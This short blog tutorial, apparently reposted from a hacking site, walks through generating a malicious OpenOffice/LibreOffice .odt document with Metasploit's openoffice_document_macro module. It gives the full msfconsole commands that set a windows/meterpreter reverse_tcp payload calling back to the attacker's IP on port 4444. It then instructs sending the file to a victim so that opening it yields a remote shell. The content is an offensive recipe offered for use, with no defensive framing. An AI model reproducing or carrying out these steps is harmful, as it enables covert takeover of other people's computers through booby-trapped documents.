Hack Remote PC with Apache OpenOffice Text Document Malicious Macro Execution

This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.

Exploit Targets

Apach Open Office on Windows

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open the terminal in kali Linux and type msfconsole to load metasploit framework.

Now type use exploit/multi/misc/openoffice_document_macro

msf exploit (openoffice_document_macro)>set payload windows/meterpreter/reverse_tcp

msf exploit (openoffice_document_macro)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (openoffice_document_macro)>set srvhost 192.168.0.104

msf exploit (openoffice_document_macro)>set lport 4444

msf exploit (openoffice_document_macro)>exploit

 From the screenshot you can see the highlighted text is showing the path of malicious odt file.

The malicious odt File had been generated successfully which is stored on your local computer inside following path:

/root/.msf4/local/msf.odt

Now send your msf.odt files to victim, as soon as he download and open it, you can access meterpreter shell on victim computer.

Related Posts Plugin for WordPress, Blogger...

Source: www.hackingarticles.in
Hack Remote PC with Apache OpenOffice Text Document Malicious Macro Execution Hack Remote PC with Apache OpenOffice Text Document Malicious Macro Execution Reviewed by Anonymous on 10:41 AM Rating: 5